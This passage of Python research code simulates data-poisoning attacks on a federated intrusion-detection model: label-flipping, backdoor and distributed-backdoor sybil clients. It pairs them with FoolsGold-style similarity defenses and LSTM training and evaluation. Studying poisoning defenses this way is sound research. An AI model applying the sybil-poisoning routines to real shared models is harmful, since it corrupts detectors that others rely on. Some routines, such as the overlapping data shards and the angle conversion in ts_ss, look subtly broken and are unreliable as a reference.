str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n        f.write(\"Create Clients: {}\\n\".format(num_clients))\n        f.close()\n\n    # create a list of client names\n    if attack == 'label' or attack == 'backdoor':\n        client_names = ['{}_{}'.format(initial, i + (num_sybils+1)) for i in range(num_clients)]\n    elif attack == 'dba':\n        client_names = ['{}_{}'.format(initial, i + ((num_sybils*4)+1)) for i in range(num_clients)]\n    # shard data and place at each client (non-overlapping slices)\n    size = len(x_train) // num_clients\n    #print(\"size is \", size, \"\\n\")\n    client_dict={}\n    for i in range(num_clients):\n        client_dict[client_names[i]] = [x_train[i * size:(i + 1) * size], y_train[i * size:(i + 1) * size]]\n        #print(\"client is \", client_names[i])\n\n    return client_dict\n\n\ndef create_backdoor_sybils(path, attack, defense, log_name,x_trainP, y_trainP, num_sybils=1, num_clients=1, initial='client'):\n    print(\"Creating Backdoor sybils\\nnum sybils {} and num clients 
{}\".format(num_sybils, num_clients))\n num = num_sybils\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write(\"Create Backdoor Sybils: {}\\n\".format(num_sybils))\n f.close()\n\n\n # create a list of sybil names i + 1\n sybil_names = ['{}_{}'.format(initial, i + 1) for i in range(num_sybils)]\n\n # shard data and place at each client\n size = len(x_trainP) // num_sybils\n #print(\"size is \", size, \"\\n\")\n sybil_dict={}\n for i in range(num_sybils):\n sybil_dict[sybil_names[i]]= [x_trainP[i:i + size], y_trainP[i:i + size]]\n #print(\"client is \", client_names[i])\n\n return sybil_dict\n\ndef create_dba_sybils(path, attack, defense, log_name, x_trainDbaProto, y_trainDbaProto,x_trainDbaPkts, y_trainDbaPkts,x_trainDbaDport,y_trainDbaDport, x_trainDbaBytes, y_trainDbaBytes, num_sybils=1,num_clients=1, initial='client'):\n print(\"create_dba sybils num sybils {} and num clients {}\".format(num_sybils, num_clients))\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write('\\nCreate DBA Sybils {}\\n'.format(num_sybils))\n f.close()\n print('Creating {} DBA Sybils with Data Shards \\n'.format(num_sybils))\n sybil_dict={}\n protoDict = create_proto_sybils(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME, x_trainDbaProto, y_trainDbaProto,config.NUM_SYBILS, config.NUM_CLIENTS, initial='client')\n sybil_dict.update(protoDict)\n pktsDict = create_pkts_sybils(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME, x_trainDbaPkts, y_trainDbaPkts,config.NUM_SYBILS, config.NUM_CLIENTS, initial='client')\n sybil_dict.update(pktsDict)\n dportDict = create_dport_sybils(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME, x_trainDbaDport, y_trainDbaDport, config.NUM_SYBILS, config.NUM_CLIENTS, initial='client')\n sybil_dict.update(dportDict) \n bytesDict = create_bytes_sybils(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME, x_trainDbaBytes, y_trainDbaBytes, config.NUM_SYBILS, config.NUM_CLIENTS, initial='client')\n sybil_dict.update(bytesDict)\n\n return sybil_dict\n\n\ndef create_proto_sybils(path, attack, defense, log_name, x_trainDbaProto, y_trainDbaProto, num_sybils,num_clients=1, initial='client'):\n print(\"create_proto sybils num sybils {} and num clients {}\".format(num_sybils, num_clients))\n num = num_sybils\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write('\\nCreate Proto DBA Sybils: {}\\n'.format(num))\n f.close()\n print('Creating {} Proto DBA Sybils with Data Shards \\n'.format(num))\n\n # create a list of sybil names\n sybil_names = ['{}_{}'.format(initial, i + 1) for i in range(num)]\n\n # shard data and place at each client\n sizeProto = len(x_trainDbaProto) // num_sybils\n #print(\"size is \", size, \"\\n\")\n sybil_dict={}\n \n for i in range(num):\n sybil_dict[sybil_names[i]]= [x_trainDbaProto[i:i + sizeProto], y_trainDbaProto[i:i + sizeProto]]\n #print(\"client is \", client_names[i])\n\n return sybil_dict\n\ndef create_pkts_sybils(path, attack, defense, log_name, x_trainDbaPkts, y_trainDbaPkts, num_sybils,num_clients=1, initial='client'):\n print(\"create_pkts sybils num sybils {} and num clients {}\".format(num_sybils, num_clients))\n num = num_sybils\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write('\\nCreate Pkts DBA Sybils: {}\\n'.format(num))\n f.close()\n print('Creating {} Pkts DBA Sybils with Data Shards \\n'.format(num))\n \n if num 
== 1:\n iPlus = 2\n elif num == 5:\n iPlus = 6\n else:\n iPlus = 11\n\n # create a list of sybil names\n sybil_names = ['{}_{}'.format(initial, i + iPlus) for i in range(num)]\n\n # shard data and place at each client\n sizePkts = len(x_trainDbaPkts) // num_sybils\n #print(\"size is \", size, \"\\n\")\n sybil_dict={}\n \n for i in range(num):\n sybil_dict[sybil_names[i]]= [x_trainDbaPkts[i:i + sizePkts], y_trainDbaPkts[i:i + sizePkts]]\n #print(\"client is \", client_names[i])\n\n return sybil_dict\n\ndef create_dport_sybils(path, attack, defense, log_name, x_trainDbaDport, y_trainDbaDport, num_sybils,num_clients=1, initial='client'):\n print(\"create_dport sybils num sybils {} and num clients {}\".format(num_sybils, num_clients))\n num = num_sybils\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write('\\nCreate Dport DBA Sybils: {}\\n'.format(num))\n f.close()\n print('Creating {} Dport DBA Sybils with Data Shards \\n'.format(num))\n \n if num == 1:\n iPlus = 3\n elif num == 5:\n iPlus = 11\n else:\n iPlus = 21\n\n # create a list of sybil names\n sybil_names = ['{}_{}'.format(initial, i + iPlus) for i in range(num)]\n\n # shard data and place at each client\n sizeDport = len(x_trainDbaDport) // num_sybils\n #print(\"size is \", size, \"\\n\")\n sybil_dict={}\n \n for i in range(num):\n sybil_dict[sybil_names[ i]]= [x_trainDbaDport[i:i + sizeDport], y_trainDbaDport[i:i + sizeDport]]\n #print(\"client is \", client_names[i])\n\n return sybil_dict\n\ndef create_bytes_sybils(path, attack, defense, log_name, x_trainDbaBytes, y_trainDbaBytes, num_sybils,num_clients=1, initial='client'):\n print(\"create_bytes sybils num sybils {} and num clients {}\".format(num_sybils, num_clients))\n num = num_sybils\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write('\\nCreate Bytes DBA Sybils: {}\\n'.format(num))\n f.close()\n print('Creating {} Bytes DBA Sybils with Data Shards \\n'.format(num))\n \n if num == 1:\n iPlus = 4\n elif num == 5:\n iPlus = 16\n else:\n iPlus = 31\n\n # create a list of sybil names\n sybil_names = ['{}_{}'.format(initial, i + iPlus) for i in range(num)]\n\n # shard data and place at each client\n sizeBytes = len(x_trainDbaBytes) // num_sybils\n #print(\"size is \", size, \"\\n\")\n sybil_dict={}\n \n for i in range(num):\n sybil_dict[sybil_names[i]]= [x_trainDbaBytes[i:i + sizeBytes], y_trainDbaBytes[i:i + sizeBytes]]\n #print(\"client is \", client_names[i])\n\n return sybil_dict\n\n''' create_attackers creates a number of \n args:\n image_list: a list of numpy arrays of training images\n label_list:a list of binarized labels for each image\n attack_dict: dict of chosen attackers from client list\n initials: the clients'name prefix, e.g, clients_1\n\n return: a dictionary with keys clients' names and value as\n data shards - tuple of images and label lists.\n \n'''\ndef create_label_flip_sybils(path, attack, defense, log_name, x_train, y_train,num_sybils=1, num_clients=10, initial='clients'):\n\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write(\"\\nCreate Label Flip Sybils: {}\\n\".format(num_sybils))\n f.close()\n print(\"\\nCreating Label Flip Sybils with Data Shards \\n\")\n\n # create a list of client names\n client_names = ['{}_{}'.format(initial, i + 1) for i in range(num_sybils)]\n if num_sybils == 1:\n num = 3\n elif num_sybils == 5:\n num = 5\n elif num_sybils == 10:\n num = 10\n # shard data and place at each 
client\n size = len(x_train) // num\n #print(\"size is \", size, \"\\n\")\n client_dict={}\n for i in range(num_sybils):\n client_dict[client_names[i]]= [x_train[i:i + size], y_train[i:i + size]]\n \n for (client_name, data) in client_dict.items():\n data = replace_1_with_0(config.PATH, config.ATTACK, config.NUM_SYBILS, config.DEFENSE, config.LOG_NAME, data[1])\n return client_dict\n\n### for attacking all of a data set\ndef replace_1_with_0(path, attack, num_sybils, defense, log_name,data):\n \"\"\"\n :param targets: Target class IDs\n :type targets: list\n :param target_set: Set of class IDs possible\n :type target_set: list\n :return: new class IDs\n \"\"\"\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write(\"\\nFlipping Labels\\n\")\n f.close()\n print(\"Flipping Labels\")\n #print(data[:])\n for idx in range(len(data)):\n if (data[idx] == [1]).all():\n data[idx] = 0\n #print(data[:])\n return data\n\ndef get_model(timesteps,n_features):\n # loading the saved model\n #loaded_model = tf.keras.models.load_model('./IDS_Persistent_Model/persistent_model_tf')\n #then call fit\n \n \n sgd = gradient_descent_v2.SGD(learning_rate=0.001, momentum=0.9, nesterov=True)\n \n model = Sequential()\n \n #model.add(LSTM(256, return_sequences=True, input_shape=(timesteps, n_features)))\n #model.add(Dense(128, activation='relu'))\n #model.add(Dropout(.2))\n #model.add(LSTM(128, return_sequences=True))\n #model.add(Dense(64, activation='relu'))\n #model.add(Dropout(.25))\n #model.add(LSTM(64))\n #model.add(Dropout(.25))\n \n model.add(Bidirectional(LSTM(29, return_sequences=False), input_shape=(timesteps, n_features)))\n #model.add(Dense(15, activation='relu'))\n model.add(Dropout(.3))\n \n \n model.add(Dense(1, activation='sigmoid'))\n #model.compile(optimizer=keras.optimizers.Adam(), loss=keras.losses.BinaryCrossentropy(), metrics=[keras.metrics.CategoricalAccuracy(),'accuracy'])\n model.compile(optimizer=sgd, loss=keras.losses.BinaryCrossentropy(), metrics=[keras.metrics.BinaryAccuracy()])\n #model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n #with open('C:\\\\Users\\\\ChristianDunham\\\\source\\\\repos\\\\Intrusion_Detection\\\\data\\\\model_summary.txt','a') as f:\n # f.write(str(model.summary()))\n # f.close()\n #print(model.summary())\n \n #return loaded_model\n return model\n\n\ndef model_training(model,x_train,y_train,epochs=4000):\n #callbacks = EarlyStopping(monitor='accuracy', mode='max', verbose=0, patience=10,\n callbacks = EarlyStopping(monitor='binary_accuracy', mode='max', verbose=0, patience=1000,\n restore_best_weights=True)\n checkpoint_filepath = './ids_epoch_models/IDS/best_model.h5'\n mc = ModelCheckpoint(filepath=checkpoint_filepath, monitor='binary_accuracy', mode='max', verbose=2, save_best_only=True)\n ###### Change me back to 5\n ###### Swapped from 5 to speed things up for generating data\n #batch_size = 5\n batch_size = config.BATCH_SIZE\n X_train = x_train.copy()\n Y_train = y_train.copy()\n accuracy_callback = AccuracyCallback((X_train, Y_train))\n\n class_weights = {0:1.25,1:1.}\n #use verbose = 1 or 2 to see epoch progress pbar... 
each step is examples / batch\n train_history = model.fit(x_train,\n y_train,\n epochs=epochs,\n validation_split=0.2,\n class_weight=class_weights,\n shuffle=False,\n #validation_data=(x_test, (y_test, x_test)),\n batch_size=batch_size,\n verbose=0,\n callbacks=[callbacks,mc]\n )\n #print(\"\\n\\nBest Training Poisoning Accuracy:\\n{}\".format(max(train_history.history['binary_accuracy'])))\n #with open(config.PATH + config.ATTACK +'_'+ str(config.NUM_SYBILS) +'_sybil_'+ config.DEFENSE +'_IDS_model_'+ config.LOG_NAME,'a') as f:\n # f.write(\"\\n\\nBest Training IDS Accuracy:\\n{}\".format(max(train_history.history['binary_accuracy'])))\n #f.close()\n #print(\"\\n\\nBest Training Poisoning Loss:\\n{}\".format(max(train_history.history['loss'])))\n #with open(config.PATH + config.ATTACK +'_'+ str(config.NUM_SYBILS) +'_sybil_'+ config.DEFENSE +'_IDS_model_'+ config.LOG_NAME,'a') as f:\n # f.write(\"\\n\\nBest Training IDS Accuracy:\\n{}\".format(max(train_history.history['binary_accuracy'])))\n #f.close()\n\n \n #print(train_history.history.keys())\n plt.plot(train_history.history['binary_accuracy'])\n plt.plot(train_history.history['val_binary_accuracy'])\n plt.title('Model Accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train','test'], loc='upper left')\n plt.savefig('ids_train_accuracy.png')\n #plt.show()\n\n plt.plot(train_history.history['loss'])\n plt.plot(train_history.history['val_loss'])\n plt.title('Model Loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train','test'], loc='upper left')\n plt.savefig('ids_train_loss.png')\n #plt.show()\n \n \n #loss_fig = proto_distribution.plot(kind='bar', figsize=(20,16), fontsize=14).get_figure()\n #loss_fig.savefig('proto_distr.pdf')\n model = load_model(checkpoint_filepath)\n\n\n return model\n\ndef model_evaluate(path, attack, defense, log_name,model,x_train,y_train,x_test,y_test,epochs, num_sybils):\n train_pred = (model.predict(x_train, steps=None, callbacks=None, max_queue_size=10, workers=1, use_multiprocessing=False,verbose=0) > .5).astype(\"int32\") \n train_labels = np.copy(y_train).astype(\"int32\")\n test_pred = (model.predict(x_test) > .5).astype(\"int32\") \n test_labels = np.copy(y_test).astype(\"int32\")\n print(\"predicted value:\\n{}\".format(test_pred))\n print(\"label value:\\n{}\".format(test_labels))\n trainAcc = accuracy_score(train_labels, train_pred)\n testAcc = accuracy_score(test_labels, test_pred)\n f1 = f1_score(test_labels, test_pred, zero_division=0)\n precision = precision_score(test_labels, test_pred)\n classes_report = classification_report(test_labels, test_pred)\n #matrix = confusion_matrix(test_labels, test_pred, labels=[1,0])\n unique_label = [0,1]\n cmtx = pd.DataFrame(\n confusion_matrix(test_labels, test_pred, labels=unique_label), \n index=['true:{:}'.format(x) for x in unique_label], \n columns=['pred:{:}'.format(x) for x in unique_label]\n )\n\n\n list_data = [epochs, testAcc,f1, precision]\n with open(config.PATH + config.ATTACK +'_'+ str(config.NUM_SYBILS) +'_sybil_'+ config.DEFENSE +'_ids_model_results.csv' ,'a',newline='') as f_object:\n writer_object = writer(f_object)\n writer_object.writerow(list_data)\n f_object.close()\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_model_'+ log_name,'a') as f:\n f.write('\\n##################### IDS ###############################################\\n')\n f.write('\\n############################################################################################\\n')\n f.write('\\ncomm_round: {} | 
global_test_acc: {:.3%} | global_f1: {} | global_precision: {}\\n'.format(epochs, testAcc, f1, precision))\n f.write(str(classes_report))\n #f.write(\"\\nAccuracy per class:\\n{}\\n{}\\n\".format(matrix,matrix.diagonal()/matrix.sum(axis=1)))\n f.close()\n print('\\n##################### IDS ###############################################\\n')\n print('\\n############################################################################################\\n')\n print('\\ncomm_round: {} |global_train_acc: {:.3%}|| global_test_acc: {:.3%} | global_f1: {} | global_test_precision: {}'.format(epochs, trainAcc, testAcc, f1, precision))\n print(classes_report)\n #print(\"\\nAccuracy per class:\\n{}\\n{}\\n\".format(matrix,(matrix.diagonal()/matrix.sum(axis=1))))\n print(cmtx)\n\nclasses = ['normal','attack']\nclass AccuracyCallback(tf.keras.callbacks.Callback):\n\n def __init__(self, test_data):\n self.test_data = test_data\n self.class_history = ['normal', 'abnormal']\n\n def on_epoch_end(self, epoch, logs=None):\n x_data, y_data = self.test_data\n\n correct = 0\n incorrect = 0\n\n x_result = self.model.predict(x_data, verbose=0)\n\n x_numpy = []\n\n for i in classes:\n self.class_history.append([])\n\n class_correct = [0] * len(classes)\n class_incorrect = [0] * len(classes)\n\n for i in range(len(x_data)):\n x = x_data[i]\n y = y_data[i]\n\n res = x_result[i]\n\n actual_label = np.argmax(y)\n pred_label = np.argmax(res)\n\n if(pred_label == actual_label):\n x_numpy.append([\"cor:\", str(y), str(res), str(pred_label)]) \n class_correct[actual_label] += 1 \n correct += 1\n else:\n x_numpy.append([\"inc:\", str(y), str(res), str(pred_label)])\n class_incorrect[actual_label] += 1\n incorrect += 1\n with open('C:\\\\Users\\\\ChristianDunham\\\\source\\\\repos\\\\Intrusion_Detection\\\\data\\\\output\\\\training_log.txt','a') as f:\n f.write(\"\\n\\tCorrect: %d\" %(correct))\n f.write(\"\\tIncorrect: %d\" %(incorrect))\n f.close()\n #print(\"\\n\\tCorrect: %d\" %(correct))\n #print(\"\\tIncorrect: %d\" %(incorrect))\n\n for i in range(len(classes)):\n tot = float(class_correct[i] + class_incorrect[i])\n class_acc = -1\n if (tot > 0):\n class_acc = float(class_correct[i]) / tot\n with open('C:\\\\Users\\\\ChristianDunham\\\\source\\\\repos\\\\Intrusion_Detection\\\\data\\\\output\\\\training_log.txt','a') as f:\n f.write(\"\\t%s: %.3f\" %(classes[i],class_acc))\n f.close()\n #print(\"\\t%s: %.3f\" %(classes[i],class_acc)) \n\n acc = float(correct) / float(correct + incorrect) \n with open('C:\\\\Users\\\\ChristianDunham\\\\source\\\\repos\\\\Intrusion_Detection\\\\data\\\\output\\\\training_log.txt','a') as f:\n f.write(\"\\tCurrent Network Accuracy: %.3f \\n\" %(acc))\n f.close()\n #print(\"\\tCurrent Network Accuracy: %.3f\" %(acc))\n\n############################ Addtional Similarities\ndef pardonWV(n_clients, maxsm, sm, prc):\n # pardoningF for sm\n for i in range(n_clients):\n for j in range(config.POISON_FEATURES - 1):\n if i == j:\n continue\n if maxsm[i] < maxsm[j]:\n sm[i][j] = (sm[i][j] * maxsm[i]) / (maxsm[j] * prc)\n \n wv = 1 - (np.max(sm, axis=1))\n\n wv[wv > 1] = 1\n wv[wv < 0] = 0\n\n alpha = np.max(sm, axis=1)\n\n # Rescale so that max value is wv\n wv = wv / np.max(wv)\n wv[(wv == 1)] = .99\n\n # Logit function\n with np.errstate(divide='ignore'):\n wv = (np.log(wv / (1 - wv)) + 0.5)\n wv[(np.isinf(wv) + wv > 1)] = 1\n wv[(wv < 0)] = 0\n\n return wv,alpha\n\ndef std(a):\n return (np.std(a))\n\ndef std_set(a_set):\n std_a_set = np.zeros(a_set.shape) \n\n for x in range(0, len(a_set)):\n 
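# np.std of one client's flattened gradient is a scalar; assigning it to std_a_set[x] broadcasts it across the row\n        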
std_a_set[x] = std(a_set[x])\n\n    return std_a_set\n\ndef get_std(path, attack, defense, log_name,grads, num_sybils=1):\n    #### could use scipy logit(grads) here?\n    n_clients = len(grads)\n    # 1. Standard deviation per client, rescaled to [-1, 1]\n    std = std_set(grads)\n    sm = 2.*(std - np.min(std))/np.ptp(std)-1\n    prc = 1  # pardoning scale; adjust (e.g. 0.05) to improve results\n    #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n    #    f.write(\"\\nED Similarity is\\n {}\\n\".format(sm))\n    #    f.close()\n    maxsm = np.max(sm, axis=1)\n    #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n    #    f.write(\"\\nMaxsm is\\n {}\".format(maxsm))\n    #    f.close()\n    wv, alpha = pardonWV(n_clients, maxsm, sm, prc)\n    #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n    #    f.write(\"\\n\\nED wv is {}\\n\".format(wv))\n    #    f.close()\n    return wv,alpha\n\ndef norm_dist(a):\n    return (norm.pdf(a,loc=np.nanmean(a), scale = 1))\n\ndef norm_dist_a_set(a_set):\n    \"\"\"computes the normal-density transform for all vectors in a set\"\"\"\n    norm_dist_set = np.zeros(a_set.shape)\n\n    for x in range(0, len(a_set)):\n        norm_dist_set[x] = norm_dist(a_set[x])\n\n    return norm_dist_set\n### shows the distribution of points by density and\n### derives a weight vector from it\ndef get_norm_dist(path, attack, defense, log_name,grads, num_sybils=1):\n    n_clients = len(grads)\n    # 1. Normal density per client, rescaled to [-1, 1]\n    nd = norm_dist_a_set(grads)\n    sm = 2.*(nd - np.min(nd))/np.ptp(nd)-1\n    prc = 1  # pardoning scale; adjust (e.g. 0.05) to improve results\n    maxsm = np.max(sm, axis=1)\n    wv, alpha = pardonWV(n_clients, maxsm, sm, prc)\n    #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n    #    f.write(\"\\n\\nED wv is {}\\n\".format(wv))\n    #    f.close()\n    return wv,alpha\n\n\ndef jaccard_similarity(a, b):\n    # convert to set\n    a = set(a)\n    b = set(b)\n    # calculate jaccard similarity\n    j = float(len(a.intersection(b))) / len(a.union(b))\n    return j\n\ndef jaccard_a_set(a_set):\n    \"\"\"computes the best pairwise jaccard score for every vector in a set\"\"\"\n    jaccard_set = np.zeros(a_set.shape)\n\n    length = len(a_set)\n    for x in range(length):\n        best = 0.0  # reset per row so one highly similar pair does not taint every client\n        for y in range(length):\n            if x == y:\n                continue\n            temp = jaccard_similarity(a_set[x], a_set[y])\n            if temp > best:\n                best = temp\n        jaccard_set[x] = best\n\n    return jaccard_set\n\n## values of 0 to 1 with 1 being similar and 0 not, so we don't want to pardon these the same way\ndef jaccard(path, attack, defense, log_name,grads, num_sybils=1):\n    n_clients = len(grads)\n    # 1. 
Logit\n sm = jaccard_a_set(grads)\n \n # pardoningF for sm\n wv = np.zeros(n_clients)\n for i in range(n_clients):\n wv[i] = np.sum(sm[i])\n\n \n wv = 1 - (np.max(sm, axis=1))\n\n wv[wv > 1] = 1\n wv[wv < 0] = 0\n\n alpha = np.max(sm, axis=1)\n\n # Rescale so that max value is wv\n wv = wv / np.max(wv)\n wv[(wv == 1)] = .99\n\n # Logit function\n with np.errstate(divide='ignore'):\n wv = (np.log(wv / (1 - wv)) + 0.5)\n wv[(np.isinf(wv) + wv > 1)] = 1\n wv[(wv < 0)] = 0\n\n return wv,alpha\n\ndef softmax(a_vector):\n \"\"\"Compute a logit for a vector.\"\"\"\n denom = (1 + sum(np.exp(a_vector)))\n logit = np.exp(a_vector)/denom\n return logit\n\ndef inv_log_a_set(a_set):\n \"\"\"computes logits for all vectors in a set\"\"\"\n softmax_set = np.zeros(a_set.shape) \n\n for x in range(0, len(a_set)):\n softmax_set[x] = softmax(a_set[x])\n\n return softmax_set\n\n## probability of logit 0 to 1 mapped in real numbers neg inf to inf...\n## however the inverse of that 0 = negative inf and 1 = pos inf..\n## no need to pardon this either?\ndef get_inv_logit(path, attack, defense, log_name,grads, num_sybils=1):\n n_clients = len(grads)\n # 1. Logit\n sm = inv_log_a_set(grads)\n prc = 1 \n maxsm = np.max(sm, axis=1)\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nMaxsm is\\n {}\".format(maxsm))\n # f.close()\n \n prc = 1 \n maxsm = np.max(sm, axis=1)\n wv, alpha = pardonWV(n_clients, maxsm, sm, prc)\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\n\\nED wv is {}\\n\".format(wv))\n # f.close()\n return wv,alpha\n\n\ndef ed(path, attack, defense, log_name,grads, num_sybils=1):\n n_clients = len(grads)\n # 1. Euclidean Normalized\n distance_calc = smp.euclidean_distances(grads)\n normalized = 2.*(distance_calc - np.min(distance_calc))/np.ptp(distance_calc)-1\n sm = normalized - np.eye(n_clients)\n prc = 0.05 # adjust value to improve results\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nED Similarity is\\n {}\\n\".format(sm))\n # f.close()\n prc = 1 \n maxsm = np.max(sm, axis=1)\n #print(\"Maxsm is\\n {}\".format(maxsm))\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nMaxsm is\\n {}\".format(maxsm))\n # f.close()\n \n # pardoning\n for i in range(n_clients):\n for j in range(n_clients):\n if i == j:\n continue\n if maxsm[i] < maxsm[j]:\n sm[i][j] = sm[i][j] * maxsm[i] / maxsm[j] * prc\n wv = 1 - (np.max(sm, axis=1))\n\n wv[wv > 1] = 1\n wv[wv < 0] = 0\n\n alpha = np.max(sm, axis=1)\n\n # Rescale so that max value is wv\n wv = wv / np.max(wv)\n wv[(wv == 1)] = .99\n\n # Logit function\n wv = (np.log(wv / (1 - wv)) + 0.5)\n wv[(np.isinf(wv) + wv > 1)] = 1\n wv[(wv < 0)] = 0\n\n # wv is the weight\n return wv,alpha\n\n\ndef manhattan(path, attack, defense, log_name,grads, num_sybils=1):\n n_clients = len(grads)\n # 2. 
Manhattan Normalized\n distance_calc = smp.manhattan_distances(grads)\n normalized = 2.*(distance_calc - np.min(distance_calc))/np.ptp(distance_calc)-1\n sm = normalized - np.eye(n_clients)\n prc = 0.05 # adjust value to improve results\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nManhattan Similarity is\\n {}\\n\".format(sm))\n # f.close()\n prc = 1 \n maxsm = np.max(sm, axis=1)\n #print(\"Maxsm is\\n {}\".format(maxsm))\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nMaxsm is\\n {}\".format(maxsm))\n # f.close()\n \n # pardoning\n for i in range(n_clients):\n for j in range(n_clients):\n if i == j:\n continue\n if maxsm[i] < maxsm[j]:\n sm[i][j] = sm[i][j] * maxsm[i] / maxsm[j] * prc\n wv = 1 - (np.max(sm, axis=1))\n\n wv[wv > 1] = 1\n wv[wv < 0] = 0\n\n alpha = np.max(sm, axis=1)\n\n # Rescale so that max value is wv\n wv = wv / np.max(wv)\n wv[(wv == 1)] = .99\n\n # Logit function\n wv = (np.log(wv / (1 - wv)) + 0.5)\n wv[(np.isinf(wv) + wv > 1)] = 1\n wv[(wv < 0)] = 0\n\n # wv is the weight\n return wv,alpha\n\n# Takes in grad\n# Compute similarity\n# Get weightings\ndef foolsGold(path, attack, defense, log_name,grads, num_sybils=1):\n n_clients = len(grads)\n sm = smp.cosine_similarity(grads) - np.eye(n_clients)\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nCS Similarity is\\n {}\\n\".format(cs))\n # f.close()\n maxsm = np.max(sm, axis=1)\n prc = 1\n #print(\"Maxcs is \\n {}\".format(maxcs))\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nMaxcs is \\n {}\\n\".format(maxcs)) \n # f.close()\n\n # pardoning\n for i in range(n_clients):\n for j in range(n_clients):\n if i == j:\n continue\n if maxsm[i] < maxsm[j]:\n sm[i][j] = sm[i][j] * maxsm[i] / maxsm[j] * prc\n wv = 1 - (np.max(sm, axis=1))\n\n wv[wv > 1] = 1\n wv[wv < 0] = 0\n\n alpha = np.max(sm, axis=1)\n\n # Rescale so that max value is wv\n wv = wv / np.max(wv)\n wv[(wv == 1)] = .99\n\n # Logit function\n wv = (np.log(wv / (1 - wv)) + 0.5)\n wv[(np.isinf(wv) + wv > 1)] = 1\n wv[(wv < 0)] = 0\n\n # wv is the weight\n return wv,alpha\n\ndef ts_ss(v, eps=1e-15, eps2=1e-4):\n # reusable compute\n v_inner = torch.mm(v, v.t())\n vs = v.norm(dim=-1, keepdim=True)\n vs_dot = vs.mm(vs.t())\n\n # compute triangle(v)\n v_cos = v_inner / vs_dot\n v_cos = v_cos.clamp(-1. + eps2, 1. - eps2) # clamp to avoid backprop instability\n theta_ = torch.acos(v_cos) + math.radians(10)\n theta_rad = theta_ * math.pi / 180.\n tri = (vs_dot * torch.sin(theta_rad)) / 2.\n\n # compute sector(v)\n v_norm = (v ** 2).sum(-1, keepdim=True)\n euc_dist = v_norm + v_norm.t() - 2.0 * v_inner\n euc_dist = torch.sqrt(torch.abs(euc_dist) + eps) # add epsilon to avoid srt(0.)\n magnitude_diff = (vs - vs.t()).abs()\n sec = math.pi * (euc_dist + magnitude_diff) ** 2 * theta_ / 360.\n\n return tri * sec\n\n\n# Takes in grad\n# Compute similarity\n# Get weightings\ndef asf(path, attack, defense, log_name,grads, num_sybils=1):\n n_clients = len(grads)\n # 3. 
TS-SS Triangle Area Similarity - Sector Area Similarity\n v = torch.tensor(grads)\n # TS-SS normalized\n distance_calc = ts_ss(v).numpy()\n normalized = 2.*(distance_calc - np.min(distance_calc))/np.ptp(distance_calc)-1\n sm = normalized - np.eye(n_clients)\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nASF Similarity is\\n {}\\n\".format(sm))\n # f.close()\n prc = 0.05 \n maxsm = np.max(sm, axis=1)\n #print(\"Maxsm is\\n {}\".format(maxsm))\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nMaxsm is\\n {}\".format(maxsm))\n # f.close()\n \n # pardoning\n for i in range(n_clients):\n for j in range(n_clients):\n if i == j:\n continue\n if maxsm[i] < maxsm[j]:\n sm[i][j] = sm[i][j] * maxsm[i] / maxsm[j] * prc\n wv = 1 - (np.max(sm, axis=1))\n\n wv[wv > 1] = 1\n wv[wv < 0] = 0\n\n alpha = np.max(sm, axis=1)\n\n # Rescale so that max value is wv\n wv = wv / np.max(wv)\n wv[(wv == 1)] = .99\n\n # Logit function\n wv = (np.log(wv / (1 - wv)) + 0.5)\n wv[(np.isinf(wv) + wv > 1)] = 1\n wv[(wv < 0)] = 0\n\n # wv is the weight\n return wv,alpha\n\n\n\ndef make_sim_timesteps(x_data, y_data, num_steps):\n X = []\n y = []\n #print(\"In Time Steps\\nAppend num_steps:{} rows\\n\".format(num_steps))\n #Time steps drops length of arr - num_steps to length of arr - so add num_steps at end to get all\n 